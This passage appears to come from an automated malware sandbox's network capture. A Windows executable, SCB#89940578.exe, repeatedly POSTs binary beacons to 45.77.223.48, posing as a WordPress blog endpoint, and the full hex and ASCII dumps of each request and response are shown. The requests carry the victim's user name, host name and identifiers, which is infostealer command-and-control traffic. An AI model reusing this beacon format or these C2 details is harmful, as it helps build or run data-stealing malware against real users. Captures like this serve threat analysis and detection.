                                            Apr 26, 2024 04:42:27.349315882 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.44975845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:27.665906906 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:27.852904081 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:28.809050083 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:27 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:28.809174061 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:42:28.809266090 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:28.809453964 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:28.829871893 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:28.831037045 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:28.831212044 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:28.831322908 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:28.831470013 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:28.831548929 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.44975945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:29.146660089 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:29.335643053 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:30.546466112 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:29 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:30.546561956 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:30.546730995 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:30.567848921 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:30.568367958 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:30.568507910 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:30.568613052 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:30.568639040 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:30.568675995 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:30.735337973 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f
                                            Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.44976045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:30.890482903 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:31.079432964 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:31.972002983 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:30 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:31.972035885 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:31.972186089 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:31.980283022 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:31.980451107 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:31.980593920 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:31.980775118 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:31.980952024 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:31.981331110 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:31.981400013 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.44976145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:32.693378925 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:32.881728888 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:33.827434063 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:32 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:33.827451944 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                            Apr 26, 2024 04:42:33.827575922 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:33.835581064 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:33.835835934 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:33.835848093 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:33.835978031 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:33.836019039 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:33.836107969 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:33.836121082 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.44976245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:34.173942089 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:34.363003969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:35.261075974 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:34 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:35.261209965 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:35.261291027 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:35.274274111 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:35.274288893 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:35.274300098 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
